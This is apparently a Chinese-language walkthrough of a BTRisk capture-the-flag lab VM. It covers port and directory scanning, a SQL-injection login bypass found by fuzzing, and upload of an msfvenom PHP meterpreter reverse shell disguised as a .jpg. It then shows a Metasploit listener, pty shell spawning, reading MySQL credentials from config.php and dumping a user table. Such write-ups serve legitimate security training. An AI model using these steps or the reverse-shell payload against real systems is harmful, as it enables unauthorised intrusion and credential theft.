1 获取靶机相关信息
nmap -sV 192.168.222.131
***
Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-20 03:09 EDT
Nmap scan report for localhost (192.168.222.131)
Host is up (0.000067s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 00:0C:29:97:47:75 (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.92 seconds
***

nmap -sV.png

nmap -A -v -T4 192.168.222.131

***
Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-20 03:11 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 03:11
Completed NSE at 03:11, 0.00s elapsed
Initiating NSE at 03:11
Completed NSE at 03:11, 0.00s elapsed
Initiating NSE at 03:11
Completed NSE at 03:11, 0.00s elapsed
Initiating ARP Ping Scan at 03:11
Scanning 192.168.222.131 [1 port]
Completed ARP Ping Scan at 03:11, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 03:11
Completed Parallel DNS resolution of 1 host. at 03:11, 0.00s elapsed
Initiating SYN Stealth Scan at 03:11
Scanning localhost (192.168.222.131) [1000 ports]
Discovered open port 80/tcp on 192.168.222.131
Discovered open port 21/tcp on 192.168.222.131
Discovered open port 22/tcp on 192.168.222.131
Completed SYN Stealth Scan at 03:11, 0.12s elapsed (1000 total ports)
Initiating Service scan at 03:11
Scanning 3 services on localhost (192.168.222.131)
Completed Service scan at 03:11, 6.01s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against localhost (192.168.222.131)
NSE: Script scanning 192.168.222.131.
Initiating NSE at 03:11
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
Completed NSE at 03:11, 3.51s elapsed
Initiating NSE at 03:11
Completed NSE at 03:11, 0.00s elapsed
Initiating NSE at 03:11
Completed NSE at 03:11, 0.00s elapsed
Nmap scan report for localhost (192.168.222.131)
Host is up (0.00014s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 192.168.222.128
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 600
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|   256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_  256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: BTRisk
MAC Address: 00:0C:29:97:47:75 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.249 days (since Tue Oct 19 21:13:36 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.14 ms localhost (192.168.222.131)

NSE: Script Post-scanning.
Initiating NSE at 03:11
Completed NSE at 03:11, 0.00s elapsed
Initiating NSE at 03:11
Completed NSE at 03:11, 0.00s elapsed
Initiating NSE at 03:11
Completed NSE at 03:11, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.41 seconds
     Raw packets sent: 1023 (45.806KB) | Rcvd: 1015 (41.290KB)
***

nmap -A.png

2.发现存在80端口,扫描其网页目录
dirb http://192.168.222.131

***
-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Oct 20 03:21:34 2021
URL_BASE: http://192.168.222.131/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.222.131/ ----
==> DIRECTORY: http://192.168.222.131/assets/
+ http://192.168.222.131/index.php (CODE:200|SIZE:758)
==> DIRECTORY: http://192.168.222.131/javascript/
+ http://192.168.222.131/server-status (CODE:403|SIZE:295)
==> DIRECTORY: http://192.168.222.131/uploads/

---- Entering directory: http://192.168.222.131/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.222.131/javascript/ ----
==> DIRECTORY: http://192.168.222.131/javascript/jquery/

---- Entering directory: http://192.168.222.131/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.222.131/javascript/jquery/ ----
+ http://192.168.222.131/javascript/jquery/jquery (CODE:200|SIZE:252879)
+ http://192.168.222.131/javascript/jquery/version (CODE:200|SIZE:5)

-----------------
END_TIME: Wed Oct 20 03:21:42 2021
DOWNLOADED: 13836 - FOUND: 4

***

dirb.png

nikto -host IP:PORT(如果是80端口,可以不加端口号)
nikto -host 192.168.222.131

***
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.222.131
+ Target Hostname:    192.168.222.131
+ Target Port:        80
+ Start Time:         2021-10-20 03:25:17 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
 #php的配置文件,会有sql的账户以及密码文件
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7915 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2021-10-20 03:26:10 (GMT-4) (53 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested 
***

nikto.png

2、登陆目标靶机login页面

登陆页面.png

JS拦截.png

定义了用户的值,将值赋值到了user变量中,密码,赋值到了pwd变量。str是user用户和子字符串,从用户名最后一个出现@符号+1 开始,一直到user的结束。

可以发现pwd==" ' "如果密码等于单引号会提示hacker,可以联想到sql注入,使用fuzz模糊测试是否存在sql注入

绕过登录认证机制

web模糊测试字典位置 /usr/share/wordlists/wfuzz

wfuzz.png

burp爆破

burp爆破.png

爆破出来些sql注入的密码

爆破密码.png

访问burp的网页链接

http://burp/show/2/z04tysv5yakgkqk89wm5h4owdubpursu

访问链接.png

登陆成功.png

3、发现这是个文件上传页面

检测不出来php页面

检测.png

只能检测出来jpg,该网页对上传内容进行了限制

通过抓包进行修改上传PHP

利用msf创建一个可以回弹的shell

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.222.128(本地gj机) lport=4444(端口) -f raw > /root/shell.php(文件路径&文件名)
修改shell,将注释符删去

创建php.png

修改shell.png

将shell.php重命名为shell.jpg               #绕过登录验证
在利用burpsuite进行抓包更改绕过验证,以实现绕过
上传成功

重命名.png

更改后缀.png

上传成功.png

通过倾听端口方式回弹shell

1、利用msf进行监听

msfconsole                //打开msf工具
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp             //设置payload
set lhost 192.168.222.128                      //回弹的IP地址
set lport 4444                                    //回弹的端口

image.png

网页点开payload页面

image.png

回弹成功

image.png

sysinfo           //查看系统配置
查看config.php的配置文件
查看出mysql的信息.账户和密码

image.png

image.png

mysql -u root -p      //登录mysql
show databases;   //查看sql信息,发现权限不够
python -c "import pty;pty.spawn('/bin/bash')"     //python提供pty模块,一行脚本就可以创建一个原生的终端
利用原生的终端进行登录mysql,查看mysql的内容
mysql -u root -p
输入密码:toor
show databases;               //查看当前的数据库列表
use  deneme;              //使用deneme数据库
select * from user;           //查看表中信息
查看到用户名以及密码
使用ssh登录

image.png

image.png

image.png